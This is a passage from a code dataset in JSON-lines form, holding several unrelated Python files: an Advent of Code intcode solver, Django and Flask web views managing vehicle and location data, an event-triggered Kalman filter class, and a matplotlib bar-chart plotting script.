break\n\n        if command == 1:\n            input[save_to] = val_one + val_two\n        elif command == 2:\n            input[save_to] = val_one * val_two\n\n        # print(input)\n        # print('\\n')\n\n        command_index += 4\n\n        # print('command_index: ' + str(command_index) + '\\n')\n        # print('command: ' + str(input[command_index]) + '\\n')\n    # print(\"HELLO\")\n    return(input[0])\n\nprint(\"****START****\")\nnv = -1\n\nfor i in range(100):\n    for j in range(100):\n        # print(\"i: \" + str(i) + \" j: \" + str(j))\n        # This was the key, and it was hinted in the instructions.\n        # Need to make fresh copies, otherwise the lists are copied by reference.\n        inp = master_input.copy()\n        inp[1] = i\n        inp[2] = j\n        # print(inp)\n        output = find_output(inp)\n        # print(output)\n        if output == 19690720:\n            nv = 100 * i + j\n            print(nv)\n            break\n        inp = master_input.copy()\n        inp[1] = j\n        inp[2] = i\n        # print(inp)\n        output = find_output(inp)\n        # print(output)\n        if output == 19690720:\n            nv = 100 * j + i\n            print(nv)\n            break\n    if nv != -1:\n        break","repo_name":"killercatfish/AdventCode","sub_path":"2019/Day2/day2_part2.py","file_name":"day2_part2.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} {"seq_id":"70911966349","text":"from rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom django.shortcuts import redirect, render\n\n# Forms\nfrom vehicle_inventory.forms import VehicleForm\n\n# Serializer\nfrom vehicle_inventory.serializers import VehicleSerializer, CreateVehicleSerializer\n\n# Models\nfrom vehicle_inventory.models import Vehicle\n\n\n@api_view(['Get'])\ndef list_vehicles(request):\n    \"\"\"List Vehicles.\"\"\"\n    vehicles = Vehicle.objects.all()\n    serializer = VehicleSerializer(vehicles, many=True)\n    return Response(serializer.data)\n\n\n@api_view(['Get'])\ndef list_vehicles_portal(request):\n    \"\"\"List Vehicles.\"\"\"\n    vehicles = Vehicle.objects.all()\n    print(vehicles)\n    return render(\n        request=request,\n        template_name=\"list.html\",\n        context={\n            'vehicles': vehicles\n        }\n    )\n\n\n@api_view(['GET', 'POST'])\ndef create_vehicle(request):\n    \"\"\"Create a Vehicle.\"\"\"\n    if request.method == 'POST':\n        serializer = CreateVehicleSerializer(data=request.data)\n        serializer.is_valid(raise_exception=True)\n        vehicle = serializer.save()\n        return redirect('v1/portal/vehicles/list')\n\n    else:\n        return render(\n            request=request,\n            template_name=\"new.html\",\n        
)\n","repo_name":"Audio10/Dealership","sub_path":"vehicle_inventory/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"11376079522","text":"from __future__ import division\n\"\"\"@package etddf\n\nFilter class for event triggering.\n\nPrimary filter class is ETFilter but an asset's main filter differs slightly. The main filter needs access\nto common filter's (ETFilter) estimate in order to fuse implicit measurements. Therefore another class exists,\nETFilter_Main, that also takes in a dictionary with common filters to other assets.\n\nSupports following dynamics, dimensions and states\n - Linear 1D (x, x_dot)\n - Linear 2D (x, y, x_dot, y_dot)\n - Nonlinear 2D (x, y, yaw, x_dot, y_dot, yaw_dot)\n - Linear 3D (x, y, z, x_dot, y_dot, z_dot)\n - Nonlinear 3D (x, y, z, yaw, x_dot, y_dot, z_dot, yaw_dot)\n\nSupports fusing all Explicit and Implicit measurements defined in etddf/measurements.py\n\"\"\"\n__author__ = \"Luke Barbier\"\n__copyright__ = \"Copyright 2020, COHRINT Lab\"\n__email__ = \"luke.barbier@colorado.edu\"\n__status__ = \"Stable\"\n__license__ = \"MIT\"\n__maintainer__ = \"Luke Barbier\"\n\nimport numpy as np\nfrom etddf.measurements import *\nfrom etddf.dynamics import linear_propagation\nfrom etddf.normalize_angle import *\nfrom etddf.measurement_expected import get_nonlinear_expected_meas\nfrom etddf.measurement_jacobians import get_measurement_jacobian\nfrom etddf.instantiate_asset import instantiate_asset_linrel, check_instantiate_asset_linrel\nfrom scipy.stats import norm as normal\nfrom copy import deepcopy\nfrom pdb import set_trace\nfrom scipy import integrate\n\nDEBUG=False\n# Uncertainty hreshold at which we drop all previous tracking and instantiate a new tracking of an asset based off of range/bearing measurement data\n# Used on first measurement of red asset\nNO_ASSET_INFORMATION = 50**2 \n\nclass ETFilter(object):\n\n def __init__(self, my_id, num_ownship_states, world_dim, x0, P0, linear_dynamics):\n self.my_id = my_id\n self.num_ownship_states = num_ownship_states\n self.world_dim = world_dim\n self.x_hat = deepcopy(x0)\n self.P = deepcopy(P0)\n self.linear_dynamics = linear_dynamics\n self.num_states = self.x_hat.size\n if (self.num_states % self.num_ownship_states) != 0:\n raise ValueError(\"Dimensionality of state vector does not align with the number of ownship states.\")\n elif num_ownship_states < world_dim:\n raise ValueError(\"Number of ownship states does not make sense for world dimension\")\n self.num_assets = int( self.num_states / self.num_ownship_states )\n self.meas_queue = []\n\n def check_implicit(self, meas):\n \"\"\"Checks if a measurement can be fused implicitly\n\n Arguments:\n meas {etddf.measurements.Explicit} -- Measurement to be checked\n\n Raises:\n TypeError: meas is not of type Explicit\n\n Returns:\n bool -- True for implicit / False for explicit\n \"\"\"\n # TODO add support for scaling innovation check by the uncertainty\n if not isinstance(meas, Explicit):\n raise TypeError(\"meas must of type Explicit\")\n if meas.is_angle_meas:\n meas.data = normalize_angle(meas.data)\n\n C = get_measurement_jacobian(meas, self.x_hat, self.num_states, self.world_dim, self.num_ownship_states)\n innovation = self._get_innovation(meas, C)\n return np.abs(innovation) <= meas.et_delta\n\n def add_meas(self, meas):\n \"\"\"Adds a measurement to the filter\n\n Arguments:\n meas {etddf.measurements.Measurement} -- 
Measurement to be fused\n\n        Raises:\n            TypeError: meas is not of type Measurement\n        \"\"\"\n        if DEBUG:\n            print(str(self.my_id) + \" receiving meas: \" + meas.__class__.__name__ + \" | data: \" + str(meas.data))\n\n        if not isinstance(meas, Measurement):\n            raise TypeError(\"meas must be of type Measurement\")\n        if meas.is_angle_meas and not isinstance(meas, Implicit):\n            meas.data = normalize_angle(meas.data)\n\n        self.meas_queue.append(meas)\n\n        # Check if we should instantiate this asset based off of the meas LinRel information\n        if check_instantiate_asset_linrel(meas, self.P, self.meas_queue, NO_ASSET_INFORMATION, self.num_ownship_states):\n            self.x_hat, self.P, self.meas_queue = instantiate_asset_linrel(meas.measured_asset_id, deepcopy(self.x_hat), deepcopy(self.P), deepcopy(self.meas_queue), self.num_ownship_states)\n    \n    def predict(self, u, Q, time_delta=1.0, use_control_input=False):\n        \"\"\"Runs prediction step on the filter\n\n        Arguments:\n            u {np.ndarray} -- control input (num_ownship_states / 2, 1)\n            Q {np.ndarray} -- motion/process noise (nstates, nstates)\n\n        Keyword Arguments:\n            time_delta {float} -- Amount of time to predict in future (default: {1.0})\n            use_control_input {bool} -- Whether to use control input or assume constant velocity (default: {False})\n\n        Raises:\n            ValueError: Incorrect u dimensions\n            ValueError: Incorrect Q dimensions\n            NotImplementedError: Nonlinear Propagation\n        \"\"\"\n        if u.shape[1] > u.shape[0]:\n            raise ValueError(\"u must be a column vector\")\n        if Q.shape != self.P.shape:\n            raise ValueError(\"Q must have (state x state) dimensions\")\n\n        if self.linear_dynamics:\n            self.x_hat, A = linear_propagation(self.x_hat, u, self.num_ownship_states, self.my_id, time_delta, use_control_input)\n            self.P = A.dot( self.P.dot( A.T )) + Q\n        else: # nonlinear dynamics\n            # G = nonlinear_propagation(u)\n            # self.P = G.dot( self.P.dot( G.T )) + Q\n            # self.x_hat = normalize_all_angles(self.x_hat, self.num_ownship_states, self.num_assets, self.world_dim)\n            raise NotImplementedError(\"nonlinear propagation requested\")\n\n    def correct(self):\n        \"\"\"Runs correction step on the filter\n        \"\"\"\n        if not self.meas_queue:\n            # print(\"meas_queue is empty!\")\n            return\n\n        x_hat_start = deepcopy(self.x_hat)\n        P_start = deepcopy(self.P)\n        for meas in self.meas_queue:\n            if DEBUG:\n                print(\"Fusing \" + meas.__class__.__name__ + \" of \" + str(meas.src_id) + \" w/ data: \" + str(meas.data))\n                print(\"State of Filter:\")\n                print(\"x_hat\")\n                print(self.x_hat)\n                print(\"P\")\n                print(self.P)\n\n            R = meas.R\n            if isinstance(meas, Explicit):\n                C = get_measurement_jacobian(meas, self.x_hat, self.num_states, self.world_dim, self.num_ownship_states)\n                K = self._get_kalman_gain(C, R)\n                innovation = self._get_innovation(meas, C).reshape(1,1)\n                self.x_hat += np.dot( K, innovation)\n                tmp = np.eye(self.num_states) - np.dot(K, C)\n                self.P = tmp.dot(self.P)\n                # self.P = np.dot( np.dot(tmp, self.P), tmp.T) + K.dot(R_mat.dot(K.T))\n            else: # Implicit Update\n                C = get_measurement_jacobian(meas, self.x_hat, self.num_states, self.world_dim, self.num_ownship_states)\n                mu, Qe, alpha = self._get_implicit_predata(C, R, x_hat_start, P_start, meas)\n                z_bar, curly_theta = self._get_implicit_data(meas.et_delta, mu, Qe, alpha)\n                K = self._get_kalman_gain(C, R)\n                if meas.is_angle_meas:\n                    z_bar = normalize_angle(z_bar)\n                self.x_hat += np.dot(K, z_bar)\n                self.P = self.P - curly_theta * K.dot(C.dot(self.P))\n            self.x_hat = normalize_all_angles( self.x_hat , self.num_ownship_states, self.num_assets, self.world_dim)\n        # Clear 
measurement queue\n        self.meas_queue = []\n\n    # If ETFilter_Main, method is overridden\n    def _get_implicit_predata(self, C, R, x_hat_start, P_start, meas):\n        mu = alpha = 0 # mu, alpha cancel out in the common information filter, not the case in main filter\n        Qe = np.abs( C.dot( P_start.dot( C.T )) + R )\n        return mu, Qe, alpha\n\n    def _get_innovation(self, meas, C):\n        expected_meas = None\n        if meas.is_linear_meas:\n            expected_meas = C.dot(self.x_hat)\n        else:\n            expected_meas = get_nonlinear_expected_meas(meas, self.x_hat, self.world_dim, self.num_ownship_states)\n        # if not meas.is_linear_meas:\n        #     print(\"expected meas \" + meas.__class__.__name__ + \" : \" + str(expected_meas))\n        #     print(\"---> actual meas: \" + str(meas.data))\n        if meas.is_angle_meas:\n            return normalize_angle( meas.data - expected_meas)\n        else:\n            return meas.data - expected_meas\n\n    def _get_kalman_gain(self, C, R):\n        tmp = np.dot( np.dot(C, self.P), C.T ) + R\n        tmp_inv = np.linalg.inv( tmp ) if tmp.size > 1 else tmp**(-1) # Accommodate 1D and >1D filter\n        return self.P.dot(C.T.dot( tmp_inv ))\n\n    def _get_implicit_data(self, delta, mu, Qe, alpha):\n        Q_func = lambda x : 1 - normal.cdf(x)\n        \n        arg1 = ( -delta + alpha - mu ) / np.sqrt( Qe )\n        arg2 = ( delta + alpha - mu ) / np.sqrt( Qe )\n\n        tmp = ( normal.pdf( arg1 ) - normal.pdf( arg2 ) ) / ( Q_func(arg1) - Q_func(arg2 ) )\n        z_bar = tmp.dot( np.sqrt( Qe ) )\n\n        tmp2 = ( arg1.dot( normal.pdf( arg1)) - arg2.dot( normal.pdf( arg2 )) ) / ( Q_func(arg1) - Q_func(arg2))\n        curly_theta = np.linalg.matrix_power(tmp, 2) - tmp2\n\n        return z_bar, curly_theta\n\nclass ETFilter_Main( ETFilter ):\n    \"\"\"Main filter for an asset\n    Differs slightly from an ETFilter in its implicit measurement update because it \n    needs access to common filters with other assets to fuse implicit measurements\n    \"\"\"\n    def __init__(self, my_id, num_ownship_states, world_dim, x0, P0, linear_dynamics, common_filters):\n        \"\"\"\n        common_filters : dict\n            key : int\n                other asset id\n            value : ETFilter\n                common filter between both assets\n        \"\"\"\n        super(ETFilter_Main, self).__init__(my_id, num_ownship_states, world_dim, x0, P0, linear_dynamics)\n        self.common_filters = common_filters\n    \n    def _get_implicit_predata(self, C, R, x_hat_start, P_start, meas):\n        x_ref = self._get_common_filter_states(meas.src_id).x_hat\n        if meas.is_linear_meas:\n            mu = C.dot(self.x_hat) - C.dot(x_hat_start )\n            Qe = np.abs(C.dot( P_start.dot( C.T )) + R)\n            alpha = C.dot( x_ref) - C.dot(x_hat_start )\n        else: # Nonlinear Measurement\n            mu0 = get_nonlinear_expected_meas(meas, self.x_hat, self.world_dim, self.num_ownship_states) \n            mu1 = get_nonlinear_expected_meas(meas, x_hat_start, self.world_dim, self.num_ownship_states)\n            mu = mu0 - mu1\n            Qe = np.abs(C.dot( P_start.dot( C.T )) + R)\n            alpha0 = get_nonlinear_expected_meas(meas, x_ref, self.world_dim, self.num_ownship_states)\n            alpha1 = get_nonlinear_expected_meas(meas, x_hat_start, self.world_dim, self.num_ownship_states)\n            alpha = alpha0 - alpha1\n        if meas.is_angle_meas:\n            mu = normalize_angle(mu)\n            alpha = normalize_angle(alpha)\n        return mu, Qe, alpha\n\n    def _get_common_filter_states(self, asset_id):\n        # If only one common filter, just return that one\n        if len(self.common_filters) == 1:\n            return self.common_filters[self.common_filters.keys()[0]]\n        # return the specific common filter with that asset\n        return 
self.common_filters[asset_id]","repo_name":"COHRINT/et-ddf","sub_path":"src/etddf/etfilter.py","file_name":"etfilter.py","file_ext":"py","file_size_in_byte":11487,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"82"} {"seq_id":"39771751806","text":"# coding=utf-8\r\nimport ast\r\nimport itertools\r\nimport json\r\nimport os\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.font_manager import FontProperties\r\nimport numpy as np\r\n\r\n# Compares the performance of S solutions across E environments. Each performance metric gets its own figure; within one figure, the same metric for every solution in every environment is plotted together\r\nfrom matplotlib.ticker import FormatStrFormatter\r\n\r\ndata = {\r\n    'type': \"bar\",\r\n    'figWidth': 600,\r\n    'figHeight': 350,\r\n    'mainColors': ['#0072bc',\r\n                   '#d95218',\r\n                   '#edb021',\r\n                   '#7a8cbf',\r\n                   '#009d70',\r\n                   '#979797',\r\n                   '#53b2ea'],\r\n    \r\n    'solutionList': ('VERID', 'AAR', 'IntegriDB'),\r\n    'environmentList': (\"Intel\", \"Rome\"),\r\n    \r\n    'yLog': False,\r\n    'yGrid': False,\r\n    \r\n    'paddingLeft': 0.2,\r\n    'paddingRight': 0.2,\r\n    \r\n    'marginGroups': 0.4,\r\n    'marginInner': 0.02,\r\n    'xFontSize': 20,\r\n    'xTickRotate': False,\r\n    'yFontSize': 20,\r\n    'legendFontSize': 8,\r\n    'output': False,\r\n    \r\n    'children': [\r\n        {\r\n            'name': \"insertion\",\r\n            'xTitle': '',\r\n            'yTitle': 'Insertion time (ms)',\r\n            'components': (\"Acyclic add\", \"Cyclic add\"),\r\n            'yLimit': [0, 1.4],\r\n            'y': (\r\n                (0.011, 0.203), # one solution, across the environments\r\n                (0.428, 0.220), # another solution\r\n                (0.161, 0.513)\r\n            ),\r\n            'yRange': (\r\n                ([0.009, 0.02], [0.1, 0.25]), # error range\r\n                ([0.428, 0.428], [0.220, 0.220]),\r\n                ([0.161, 0.161], [0.513, 0.513])\r\n            ),\r\n            'y2': ( # second component\r\n                (0.011, 0.203),\r\n                (0, 0.220),\r\n                (0.161, 0.513)\r\n            ),\r\n            'yRange2': (\r\n                ([0.009, 0.02], [0.1, 0.25]),\r\n                ([0.428, 0.428], [0.220, 0.220]),\r\n                ([0.161, 0.161], [0.513, 0.513])\r\n            ),\r\n        },\r\n        {\r\n            'name': \"ads\",\r\n            'yLog': True,\r\n            'xTitle': '',\r\n            'yTitle': 'ADS update (KB)',\r\n            'yLimit': [0.01, 190.0],\r\n            'y': (\r\n                (0.147, 2.140),\r\n                (1.268, 5.4367),\r\n                (5.365, 5.123),\r\n            ),\r\n            'yRange': (\r\n                ([0.015, 0.147], [0.1, 2.140]),\r\n                ([0.268, 10.268], [5.4367, 5.4367]),\r\n                ([4.365, 6.365], [5.123, 5.123])\r\n            ),\r\n        }\r\n    ]\r\n}\r\n\r\nif not os.path.exists('dist'):\r\n    os.makedirs('dist')\r\n\r\n\r\ndef nonEmptyIterable(obj):\r\n    \"\"\"return true if *obj* is iterable\"\"\"\r\n    try:\r\n        var = obj[0]\r\n        return True\r\n    except:\r\n        return False\r\n\r\n\r\ndpi = 100\r\n\r\n\r\nclass ParallelBars:\r\n    def draw(self, data, figure=None, axis=None):\r\n        if isinstance(data, str):\r\n            try:\r\n                data = json.loads(data)\r\n            except:\r\n                data = ast.literal_eval(data)\r\n        \r\n        axes = []\r\n        \r\n        for plotData in data['children']:\r\n            name = plotData['name']\r\n            print(\"---->\" + name + \"<----\\n\")\r\n\r\n            def get(key, default=None):\r\n                result = plotData.get(key, None)\r\n                if result is not None: return result\r\n                \r\n                result = data.get(key, None)\r\n                if result is not None: return result\r\n                \r\n                return default\r\n            \r\n            envList = get('environmentList')\r\n            solList = get('solutionList')\r\n            lenSol = len(solList)\r\n            components = get('components', ())\r\n            lenComp = max(1, len(components))\r\n            \r\n            envIndex = np.arange(len(envList))  # the x locations for the groups\r\n            groupWidth = 1 - get('marginGroups', 0.2)\r\n            paddingLeft = get('paddingLeft', 0.1)\r\n            paddingRight = get('paddingRight', 0.1)\r\n            marginBars = get('marginBars', 0.02)\r\n            width = groupWidth / lenSol - marginBars  # the width of the bars\r\n            \r\n            colors = 
get('mainColors',\r\n ['#0072bc', '#d95218', '#edb021', '#7a8cbf', '#009d70', '#979797', '#53b2ea',\r\n \"#ee4c9c\"] + ['C%d' % (i % 10) for i in range(100)])\r\n \r\n if figure and axis:\r\n fig, ax = figure, axis\r\n else:\r\n fig, ax = plt.subplots()\r\n fig.set_size_inches(get('figWidth', 600) / dpi, get('figHeight', 350) / dpi)\r\n fig.set_dpi(dpi)\r\n \r\n rects = [None] * (lenComp * lenSol)\r\n \r\n oldy = np.array([[0.0, ] * len(envList), ] * lenSol)\r\n for comIdx in range(lenComp):\r\n yRange = get('yRange' if comIdx == 0 else 'y%dRange' % (comIdx + 1), get('yRange%d' % (comIdx + 1), None))\r\n y = plotData['y' if comIdx == 0 else 'y%d' % (comIdx + 1)]\r\n \r\n if nonEmptyIterable(yRange):\r\n yError = np.zeros((lenSol, 2, len(y[0])))\r\n for r in range(lenSol):\r\n for c in range(len(y[r])):\r\n yError[r][0][c] = y[r][c] - yRange[r][c][0] # lower\r\n yError[r][1][c] = yRange[r][c][1] - y[r][c] # upper\r\n else:\r\n yerror = get('yError' if comIdx == 0 else 'yError%d' % (comIdx + 1), None)\r\n \r\n if yerror:\r\n yError = np.zeros((lenSol, 2, len(y[0])))\r\n for r in range(lenSol):\r\n for c in range(len(y[r])):\r\n yError[r][0][c] = yerror[r][c][1] # lower\r\n yError[r][1][c] = yerror[r][c][0] # upper\r\n else:\r\n yError = None\r\n \r\n highContrast = get(\"highContrast\", False)\r\n \r\n for solIdx in range(lenSol):\r\n normalIdx = (lenComp - 1 - comIdx) * lenSol + solIdx\r\n transpos = normalIdx // lenSol + normalIdx % lenSol * lenComp\r\n rects[transpos] = ax.bar(\r\n envIndex - groupWidth / 2 + (width + marginBars) * (solIdx + 0.5),\r\n y[solIdx], width - marginBars,\r\n bottom=oldy[solIdx],\r\n color='none' if highContrast else colors[comIdx * lenSol + solIdx],\r\n edgecolor=colors[comIdx * lenSol + solIdx] if highContrast else \"black\",\r\n hatch=['/', '\\\\', '-', '+', 'x', '.', 'o', 'O', '*', '//', '\\\\\\\\'][\r\n comIdx * lenSol + solIdx] if highContrast else None,\r\n ecolor='r', yerr=yError[solIdx] if yError is not None else None)\r\n oldy += y\r\n \r\n ax.set_xlim([0 - groupWidth / 2 - paddingLeft, len(envList) - 1 + groupWidth / 2 + paddingRight])\r\n if len(components):\r\n if lenSol == 1:\r\n legendTitles = components\r\n else:\r\n legendTitles = [None] * (\r\n lenComp * lenSol) # list((com + ' - ' + sol for sol, com in itertools.product(solList, components, )))\r\n for comIdx in range(lenComp):\r\n for solIdx in range(lenSol):\r\n normalIdx = (lenComp - 1 - comIdx) * lenSol + solIdx\r\n transpos = normalIdx // lenSol + normalIdx % lenSol * lenComp\r\n legendTitles[transpos] = components[comIdx] + ' - ' + solList[solIdx]\r\n \r\n # print(components[comIdx] + ' - ' + solList[solIdx], (lenComp - 1 - comIdx, solIdx), normalIdx, transpos)\r\n else:\r\n legendTitles = solList\r\n \r\n if get(\"showLegend\", True):\r\n font = FontProperties(weight='regular', size=get('legendFontSize', 20))\r\n \r\n if get(\"legendLoc\", None) is None and get(\"legendOutside\", True):\r\n ax.legend(rects, legendTitles, prop=font, bbox_to_anchor=(0, 1.02, 1, 0.2 * lenComp),\r\n loc=\"lower left\", mode=\"expand\", borderaxespad=0, ncol=lenSol, handlelength=1)\r\n else:\r\n ax.legend(rects, legendTitles, frameon=False, loc=get('legendLoc', 'best'), prop=font,\r\n ncol=get('legendColumn', 1), handlelength=1)\r\n \r\n font = FontProperties(weight='regular', size=get('xFontSize', 20))\r\n ax.set_xlabel(get('xTitle', \"\"), fontproperties=font)\r\n \r\n ticks = get('yTicks&Labels', None)\r\n if get('ySci'):\r\n ax.ticklabel_format(style='sci', axis='y', scilimits=get('ySci'))\r\n else:\r\n 
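# get('ySci') is assumed here to be an (m, n) pair of powers, e.g. ySci=(-2, 3):\r\n                # matplotlib's scilimits switches the axis to scientific notation for\r\n                # values outside the range 10**m to 10**n.\r\n                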
ax.ticklabel_format(style='sci', axis='y', scilimits=get('ySci'))\r\n            else:\r\n                ax.ticklabel_format(style='plain', axis='y')\r\n            \r\n            if ticks:\r\n                if len(ticks) == 2 and nonEmptyIterable(ticks[0]) and nonEmptyIterable(ticks[1]):\r\n                    ax.set_yticks(ticks[0])\r\n                    ax.set_yticklabels(ticks[1])\r\n                else:\r\n                    ax.set_yticks(ticks)\r\n            \r\n            ax.get_yaxis().set_major_formatter(matplotlib.ticker.ScalarFormatter())\r\n            ax.get_yaxis().set_minor_formatter(matplotlib.ticker.NullFormatter())\r\n            \r\n            ticks = get('xTicks&Labels', None)\r\n            if ticks:\r\n                ax.tick_params(which='minor', length=0)\r\n                if len(ticks) == 2 and nonEmptyIterable(ticks[0]) and nonEmptyIterable(ticks[1]):\r\n                    ax.set_xticks(ticks[0])\r\n                    ax.set_xticklabels(ticks[1])\r\n                else:\r\n                    ax.set_xticks(ticks)\r\n                    ax.set_xticklabels([str(i) for i in ticks])\r\n            else:\r\n                ax.set_xticks(envIndex)\r\n                ax.set_xticklabels(envList)\r\n            \r\n            font = FontProperties('sans-serif', weight='regular', size=get('xFontSize', 20) - 4)\r\n            for tick in ax.xaxis.get_major_ticks():\r\n                tick.label.set_fontproperties(font)\r\n                if get('xTickRotate', False):\r\n                    tick.label.set_rotation(45)\r\n            \r\n            font = FontProperties(weight='regular', size=get('yFontSize', 20))\r\n            ax.set_ylabel(get('yTitle', \"\"), fontproperties=font)\r\n            \r\n            font = FontProperties('sans-serif', weight='regular', size=get('yFontSize', 20) - 4)\r\n            for tick in ax.yaxis.get_major_ticks():\r\n                tick.label.set_fontproperties(font)\r\n            \r\n            if get('xLog', False):\r\n                ax.set_xscale('log')\r\n            \r\n            if get('yLog', False):\r\n                ax.set_yscale('log')\r\n            \r\n            if get('yGrid', False):\r\n                ax.yaxis.grid(True)\r\n            \r\n            lim = get('yLimit', [])\r\n            if len(lim) > 0:\r\n                realLimit = lim.copy()\r\n                \r\n                for i in range(2):\r\n                    if callable(lim[i]):\r\n                        realLimit[i] = lim[i](ax.get_ylim()[i])\r\n                \r\n                ax.set_ylim(realLimit)\r\n            \r\n            lim = get('xLimit', [])\r\n            if len(lim) > 0:\r\n                ax.set_xlim(lim)\r\n            \r\n            subAxes = []\r\n            for subfigure in get('subfigures', []):\r\n                from .plot import Ploter\r\n                subAxes.append(Ploter().plot(subfigure, fig, ax))\r\n            \r\n            # TODO add subfigures\r\n            \r\n            try:\r\n                fig.tight_layout()\r\n            except:\r\n                pass\r\n            \r\n            if get('output', False):\r\n                fig.savefig('dist/' + name + '.pdf', format='pdf', dpi=dpi, bbox_inches=\"tight\")\r\n            \r\n            plt.show(block=False)\r\n            # plt.close('all')\r\n            axes.append(ax)\r\n        \r\n        return axes\r\n\r\n\r\nif __name__ == '__main__':\r\n    ParallelBars().draw(data)\r\n    \r\n    while True:\r\n        plt.pause(0.5)\r\n","repo_name":"sshi27/plot","sub_path":"parallel_bar.py","file_name":"parallel_bar.py","file_ext":"py","file_size_in_byte":10463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} {"seq_id":"10744214492","text":"from flask import Flask, json, render_template, request\nimport os\n\n# create instance of Flask app\napp = Flask(__name__)\n\n\n# decorator\n@app.route(\"/\")\ndef hello():\n    # it is a good idea to include information on how to use your API on the home route\n    # this is just another way to do that\n    text = f\"go to /locations to see all events
\\\n and /location/ to see all data of a location
\\\n and /location/ to add additional locations\"\n return text\n\n\n@app.route(\"/locations\")\ndef all():\n json_url = \"metadata.json\"\n data_json = json.load(open(json_url))\n # render_template is always looking in templates folder\n return render_template('index.html', html_page_text=data_json)\n\n\n@app.route(\"/location/\", methods=['GET', 'POST'])\ndef add_location(location_name):\n json_url = \"metadata.json\"\n if request.method == 'GET':\n data_json = json.load(open(json_url))\n data = data_json['locations']\n location = request.view_args['location_name']\n output_data = [x for x in data if x['Location'] == location_name]\n\n # render template is always looking in tempate folder\n return render_template('location_display.html', html_page_text=output_data)\n elif request.method == 'POST':\n location = request.form['location_name']\n\n # case sensitive, so be careful!\n department = request.form['department']\n category = request.form['category']\n subcategory = request.form['subcategory']\n new_location = {\"Location\": location,\n \"Department\": department,\n \"Category\": category,\n \"SubCategory\": subcategory\n }\n\n with open(json_url, \"r+\") as file:\n data_json = json.load(file)\n data_json[\"locations\"].append(new_location)\n file.seek(0)\n json.dump(data_json, file, indent=4)\n\n # Adding text\n text_success = \"Data successfully added: \" + str(new_location)\n return render_template('index.html', html_page_text=text_success)\n\n\n@app.route(\"/deleteLocation/\", methods=['DELETE'])\ndef del_location(location_name):\n json_url = \"metadata.json\"\n location = request.form['location_name']\n\n # case sensitive, so be careful!\n department = request.form['department']\n category = request.form['category']\n subcategory = request.form['subcategory']\n new_location = {\"Location\": location,\n \"Department\": department,\n \"Category\": category,\n \"SubCategory\": subcategory\n }\n\n with open(json_url, \"r+\") as file:\n data_json = json.load(file)\n for i in range(len(data_json[\"locations\"])):\n if data_json[\"locations\"][i][\"Location\"] == location_name and \\\n data_json[\"locations\"][i][\"SubCategory\"] == subcategory:\n del data_json[\"locations\"][i]\n break\n file.seek(0)\n with open(json_url, \"w\") as writefile:\n json.dump(data_json, writefile, indent=4)\n\n # Adding text\n text_success = \"Data successfully removed: \" + str(new_location)\n return render_template('index.html', html_page_text=text_success)\n\n\n@app.route(\"/updateLocation/\", methods=['PATCH'])\ndef update_location(location_name):\n json_url = \"metadata.json\"\n location = request.form['location_name']\n\n # case sensitive, so be careful!\n department = request.form['department']\n category = request.form['category']\n subcategory = request.form['subcategory']\n\n new_location = request.form['new_location_name']\n new_department = request.form['new_department']\n new_category = request.form['new_category']\n new_subcategory = request.form['new_subcategory']\n\n existing_entry = {\"Location\": location,\n \"Department\": department,\n \"Category\": category,\n \"SubCategory\": subcategory\n }\n new_entry = {\"Location\": new_location,\n \"Department\": new_department,\n \"Category\": new_category,\n \"SubCategory\": new_subcategory\n }\n with open(json_url, \"r+\") as file:\n data_json = json.load(file)\n # get_data = data_json[\"locations\"][1][\"SubCategory\"]\n for i in range(len(data_json[\"locations\"])):\n if data_json[\"locations\"][i][\"Location\"] == location_name and \\\n 
data_json[\"locations\"][i][\"Department\"] == department and \\\n data_json[\"locations\"][i][\"Category\"] == category and \\\n data_json[\"locations\"][i][\"SubCategory\"] == subcategory:\n check_in = data_json[\"locations\"][i]\n data_json[\"locations\"][i] = new_entry\n break\n file.seek(0)\n check_in = data_json\n with open(json_url, \"w\") as writefile:\n json.dump(data_json, writefile, indent=4)\n\n # Adding text\n text_success = \"Data successfully updated: \" + str(check_in)\n return render_template('index.html', html_page_text=text_success)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"AnuNGupta/InmarCode","sub_path":"Problem_1/Endpoints.py","file_name":"Endpoints.py","file_ext":"py","file_size_in_byte":5264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"36987639381","text":"import sqlite3\nfrom flask import Flask, render_template, url_for\nimport os\napp = Flask(__name__)\n#try:\n #conn = sqlite3.connect('new')\n #print (\"Opened SQL DB\")\n#except Exception as e:\n #print(\"Error during connection :\",str(e))\n#results = conn.execute(\"SELECT * FROM Device\")\n#for row in results:\n #print (row)\n \n\n\n@app.route('/employ')\ndef employ():\n\n conn = sqlite3.connect('new')\n #mycursor = conn.cursor(dictionary=True)\n conn.row_factory = sqlite3.Row\n cur = conn.cursor()\n results = conn.execute(\"SELECT * FROM Device\")\n employees = results.fetchall()\n #print(employees)\n return render_template('view.html', employees=employees)\n\n conn.close()\n \n","repo_name":"Praveensreedhar/SQLite_PROJ","sub_path":"view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"33228923896","text":"from django.conf.urls import url\nfrom . 
